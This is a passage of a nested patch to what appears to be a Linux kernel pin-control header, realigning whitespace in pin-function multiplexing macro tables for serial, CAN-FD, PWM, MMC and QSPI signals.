++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+-/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)	FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)	FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)	FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR3 */
+-/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)	FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
